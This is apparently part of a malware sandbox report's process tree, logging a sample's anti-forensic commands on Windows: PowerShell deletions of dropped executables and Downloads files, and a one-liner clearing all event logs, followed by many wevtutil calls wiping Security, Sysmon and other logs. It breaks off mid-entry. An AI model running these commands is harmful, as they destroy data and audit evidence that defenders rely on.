  powershell "del 'C:\windows\temp\rbs.exe'"
  2⤵
  PID:1376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "del 'C:\windows\temp\mz.exe'"
  2⤵
  PID:4536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "Get-ChildItem -Path 'C:\Users\Admin\Downloads' -Filter *.lnk | Remove-Item -Force"
  2⤵
  PID:4404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "Get-ChildItem -Path 'C:\Users\Admin\Downloads' -Filter *.zip | Remove-Item -Force"
  2⤵
  PID:2184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "Get-ChildItem -Path 'C:\Users\Admin\Downloads' -Filter *.html | Remove-Item -Force"
  2⤵
  PID:2748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell "Get-WinEvent -ListLog * | ForEach-Object { wevtutil.exe cl $_.LogName }"
  2⤵
  PID:4728
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Windows PowerShell"
    3⤵
    PID:2388
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl System
    3⤵
    PID:4040
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Security
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl OAlerts
    3⤵
    - Clears Windows event logs
    PID:3396
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Key Management Service"
    3⤵
    PID:2940
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Internet Explorer"
    3⤵
    PID:3616
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl HardwareEvents
    3⤵
    PID:296
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Application
    3⤵
    PID:3728
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Windows Networking Vpn Plugin Platform/OperationalVerbose"
    3⤵
    PID:1888
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Windows Networking Vpn Plugin Platform/Operational"
    3⤵
    PID:4372
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl SMSApi
    3⤵
    PID:448
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Setup
    3⤵
    PID:2992
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl OpenSSH/Operational
    3⤵
    PID:596
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl OpenSSH/Admin
    3⤵
    - Clears Windows event logs
    PID:1068
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Network Isolation Operational"
    3⤵
    PID:872
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-WindowsPhone-Connectivity-WiFiConnSvc-Channel
    3⤵
    PID:2516
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WWAN-SVC-Events/Operational
    3⤵
    PID:3604
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-MTPClassDriver/Operational
    3⤵
    - Clears Windows event logs
    PID:680
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-CompositeClassDriver/Operational
    3⤵
    PID:2384
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WPD-ClassInstaller/Operational
    3⤵
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Workplace Join/Admin"
    3⤵
    PID:4044
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WorkFolders/WHC
    3⤵
    PID:3052
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WorkFolders/Operational
    3⤵
    PID:3528
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wordpad/Admin
    3⤵
    PID:2216
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMPNSS-Service/Operational
    3⤵
    PID:4420
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WMI-Activity/Operational
    3⤵
    PID:512
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-wmbclass/Trace
    3⤵
    PID:1120
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WLAN-AutoConfig/Operational
    3⤵
    PID:3572
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wired-AutoConfig/Operational
    3⤵
    PID:3892
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winsock-WS2HELP/Operational
    3⤵
    PID:4956
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winsock-NameResolution/Operational
    3⤵
    PID:1660
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winsock-AFD/Operational
    3⤵
    PID:1328
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinRM/Operational
    3⤵
    PID:1064
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinNat/Oper
    3⤵
    PID:2512
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Winlogon/Operational
    3⤵
    PID:1504
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinINet-Config/ProxyConfigChanged
    3⤵
    PID:3748
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinINet-Capture/Analytic
    3⤵
    PID:3948
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WinHTTP-NDF/Diagnostic
    3⤵
    PID:3704
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsUpdateClient/Operational
    3⤵
    PID:764
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsUIImmersive/Operational
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsSystemAssessmentTool/Operational
    3⤵
    PID:4308
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsColorSystem/Operational
    3⤵
    PID:3428
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WindowsBackup/ActionCenter
    3⤵
    PID:2748
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
    3⤵
    - Clears Windows event logs
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallDiagnostics"
    3⤵
    PID:2448
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
    3⤵
    PID:2268
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
    3⤵
    PID:2388
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
    3⤵
    PID:4040
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Win32k/Operational
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WFP/Operational
    3⤵
    PID:3396
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WER-PayloadHealth/Operational
    3⤵
    PID:2940
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WEPHOSTSVC/Operational
    3⤵
    PID:3616
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WebIO-NDF/Diagnostic
    3⤵
    PID:296
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WebAuthN/Operational
    3⤵
    PID:3728
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-WebAuth/Operational
    3⤵
    PID:1888
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Wcmsvc/Operational
    3⤵
    PID:4372
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VPN/Operational
    3⤵
    PID:448
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VPN-Client/Operational
    3⤵
    PID:2992
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VolumeSnapshot-Driver/Operational
    3⤵
    PID:596
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Volume/Diagnostic
    3⤵
    - Clears Windows event logs
    PID:1068
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VHDMP-Operational
    3⤵
    PID:3296
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VerifyHardwareSecurity/Operational
    3⤵
    PID:3136
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VerifyHardwareSecurity/Admin
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VDRVROOT/Operational
    3⤵
    PID:1196
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/DeviceInstall
    3⤵
    PID:3024
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/ActionCenter
    3⤵
    - Clears Windows event logs
    PID:752
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-User-Loader/Operational
    3⤵
    PID:3680
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Profile Service/Operational"
    3⤵
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Device Registration/Admin"
    3⤵
    PID:1780
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Control Panel/Operational"
    3⤵
    - Clears Windows event logs
    PID:2216
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UniversalTelemetryClient/Operational
    3⤵
    - Clears Windows event logs
    PID:3104
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UAC/Operational
    3⤵
    PID:1664
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UAC-FileVirtualization/Operational
    3⤵
    - Clears Windows event logs
    PID:4404
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TZUtil/Operational
    3⤵
    PID:2880
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TZSync/Operational
    3⤵
    PID:4716
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TWinUI/Operational
    3⤵
    PID:2100
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Troubleshooting-Recommended/Operational
    3⤵
    PID:952
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Troubleshooting-Recommended/Admin
    3⤵
    PID:3472
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Time-Service/Operational
    3⤵
    PID:3744
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Time-Service-PTP-Provider/PTP-Operational
    3⤵
    PID:4852
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational
    3⤵
    PID:1320
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational
    3⤵
    PID:3748
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin
    3⤵
    PID:3948
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RDPClient/Operational
    3⤵
    - Clears Windows event logs
    PID:3704
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-Printers/Operational
    3⤵
    PID:764
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-Printers/Admin
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Operational
    3⤵
    PID:4308
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Admin
    3⤵
    PID:3428
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Operational
    3⤵
    PID:2748
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Admin
    3⤵
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational
    3⤵
    PID:2448
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin
    3⤵
    PID:2268
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TCPIP/Operational
    3⤵
    - Clears Windows event logs
    PID:2388
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskScheduler/Operational
    3⤵
    PID:4040
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskScheduler/Maintenance
    3⤵
    PID:3248
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SystemSettingsThreshold/Operational
    3⤵
    PID:3324
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sysmon/Operational
    3⤵
    PID:304
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storsvc/Diagnostic
    3⤵
    PID:4448
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Store/Operational
    3⤵
    PID:1400
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSpaces-SpaceManager/Operational
    3⤵
    PID:284
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSpaces-SpaceManager/Diagnostic
    3⤵
    - Clears Windows event logs
    PID:4160
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSpaces-ManagementAgent/WHC
    3⤵
    - Clears Windows event logs
    PID:4476
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSpaces-Driver/Operational
    3⤵
    PID:4460
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSpaces-Driver/Diagnostic
    3⤵
    PID:4432
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageSettings/Diagnostic
    3⤵
    PID:4384
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorageManagement/Operational
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Tiering/Admin
    3⤵
    PID:2360
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Storport/Operational
    3⤵
    - Clears Windows event logs
    PID:1332
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Storport/Health
    3⤵
    - Clears Windows event logs
    PID:4768
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Storport/Admin
    3⤵
    PID:3896
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Disk/Operational
    3⤵
    - Clears Windows event logs
    PID:4536
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-Disk/Admin
    3⤵
    PID:1288
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ClassPnP/Operational
    3⤵
    PID:3056
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ClassPnP/Admin
    3⤵
    PID:1200
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ATAPort/Operational
    3⤵
    PID:1416
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Storage-ATAPort/Admin
    3⤵
    - Clears Windows event logs
    PID:4688
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StateRepository/Restricted
    3⤵
    PID:4020
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StateRepository/Operational
    3⤵
    - Clears Windows event logs
    PID:2156
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBWitnessClient/Informational
    3⤵
    PID:4420
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBWitnessClient/Admin
    3⤵
    PID:392
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBServer/Security
    3⤵
    PID:3224
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBServer/Operational
    3⤵
    PID:3116
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBServer/Connectivity
    3⤵
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBServer/Audit
    3⤵
    PID:984
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBDirect/Admin
    3⤵
    - Clears Windows event logs
    PID:4880
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmbClient/Security
    3⤵
    - Clears Windows event logs
    PID:1192
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SMBClient/Operational
    3⤵
    PID:3472
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmbClient/Connectivity
    3⤵
    PID:3744
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmbClient/Audit
    3⤵
    PID:4852
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmartScreen/Debug
    3⤵
    PID:1320
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmartCard-TPM-VCard-Module/Operational
    3⤵
    PID:780
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmartCard-TPM-VCard-Module/Admin
    3⤵
    PID:3748
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmartCard-DeviceEnum/Operational
    3⤵
    PID:3948
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SmartCard-Audit/Authentication
    3⤵
    PID:3704
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational
    3⤵
    PID:764
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Core/Operational
    3⤵
    - Clears Windows event logs
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Core/LogonTasksChannel
    3⤵
    PID:4308
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Core/AppDefaults
    3⤵
    PID:3428
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Core/ActionCenter
    3⤵
    PID:2748
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter
    3⤵
    PID:4320
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync/Operational
    3⤵
    PID:2448
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync/Debug
    3⤵
    - Clears Windows event logs
    PID:2268
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync-OneDrive/Operational
    3⤵
    PID:2388
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync-OneDrive/Debug
    3⤵
    PID:1568
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync-Azure/Operational
    3⤵
    PID:3180
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SettingSync-Azure/Debug
    3⤵
    PID:3396
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ServiceReportingApi/Debug
    3⤵
    PID:4332
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SecurityMitigationsBroker/Operational
    3⤵
    PID:3236
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SecurityMitigationsBroker/Admin
    3⤵
    - Clears Windows event logs
    PID:2428
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-UserConsentVerifier/Audit
    3⤵
    PID:3732
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter
    3⤵
    PID:284
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational
    3⤵
    PID:4160
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Netlogon/Operational
    3⤵
    PID:4476
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Mitigations/UserMode
    3⤵
    PID:4460
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Mitigations/KernelMode
    3⤵
    PID:4432
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational
    3⤵
    PID:412
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-IdentityListener/Operational
    3⤵
    PID:4384
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational
    3⤵
    PID:2360
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Audit-Configuration-Client/Operational
    3⤵
    PID:1332
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Adminless/Operational
    3⤵
    PID:4768
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SecureAssessment/Operational
    3⤵
    PID:3896
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SearchUI/Operational
    3⤵
    PID:4536
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RRAS/Operational
    3⤵
    PID:1288
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RetailDemo/Operational
    3⤵
    - Clears Windows event logs
    PID:1704
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RetailDemo/Admin
    3⤵
    PID:3052
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RestartManager/Operational
    3⤵
    PID:4860
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Resource-Exhaustion-Resolver/Operational
    3⤵
    PID:3680
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Resource-Exhaustion-Detector/Operational
    3⤵
    - Clears Windows event logs
    PID:1708
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Remotefs-Rdbss/Operational
    3⤵
    - Clears Windows event logs
    PID:4020
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational
    3⤵
    PID:2156
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin
    3⤵
    PID:4420
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational
    3⤵
    PID:392
- - C:\Windows\system32\wevtutil.exe
    "C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin
    3⤵
    PID:3224
- - C:\Windows\system32\wevtutil.exe
